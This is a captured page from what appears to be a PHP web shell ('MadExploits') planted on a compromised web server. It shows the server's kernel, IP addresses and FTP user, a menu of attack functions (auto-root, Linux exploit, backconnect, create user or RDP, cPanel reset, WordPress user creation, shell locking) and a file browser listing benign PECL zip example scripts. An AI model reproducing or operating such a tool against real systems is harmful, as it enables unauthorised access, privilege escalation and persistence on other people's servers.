Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pecl /
zip /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
addglob.php
298
B
-rw-r--r--
addpattern.php
313
B
-rw-r--r--
comment.php
177
B
-rw-r--r--
create.php
700
B
-rw-r--r--
dir.php
486
B
-rw-r--r--
encryption.php
1.05
KB
-rw-r--r--
extract.php
518
B
-rw-r--r--
extractAll.php
457
B
-rw-r--r--
fopen.php
535
B
-rw-r--r--
get_set_comments.php
914
B
-rw-r--r--
odt.php
452
B
-rw-r--r--
oldapi.php
374
B
-rw-r--r--
set_compression.php
620
B
-rw-r--r--
test.zip
553
B
-rw-r--r--
test1.zip
681
B
-rw-r--r--
test_with_comment.zip
560
B
-rw-r--r--
too.php
18
B
-rw-r--r--
zipcmd.php
3.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_set_comments.php
<?php error_reporting(E_ALL|E_STRICT); copy('test_with_comment.zip', 't.zip'); $z = new ZipArchive; $z->open('t.zip'); print_r($z); for ($i=0; $i<$z->numFiles; $i++) { echo "index: $i\n"; print_r($z->getCommentIndex($i)); echo "\n\n"; } echo "foobar/ " . $z->getCommentName('foobar/') . "\n"; echo "Archive comment: " . $z->getArchiveComment() . "\n"; $z->setCommentIndex(1, 'new comment idx 1'); $z->setCommentName('foobar/', 'new comment foobar/'); $z->setArchiveComment( 'new archive comment'); for ($i=0; $i<$z->numFiles; $i++) { echo "index: $i\n"; print_r($z->getCommentIndex($i)); echo "\n\n"; } echo $z->getCommentName('foobar/') . "\n"; // Get the original comment echo $z->getCommentName('foobar/', ZIPARCHIVE::FL_UNCHANGED) . "\n"; echo "Archive comment: " . $z->getArchiveComment() . "\n"; echo "Archive comment (original): " . $z->getArchiveComment(ZIPARCHIVE::FL_UNCHANGED) . "\n";
Close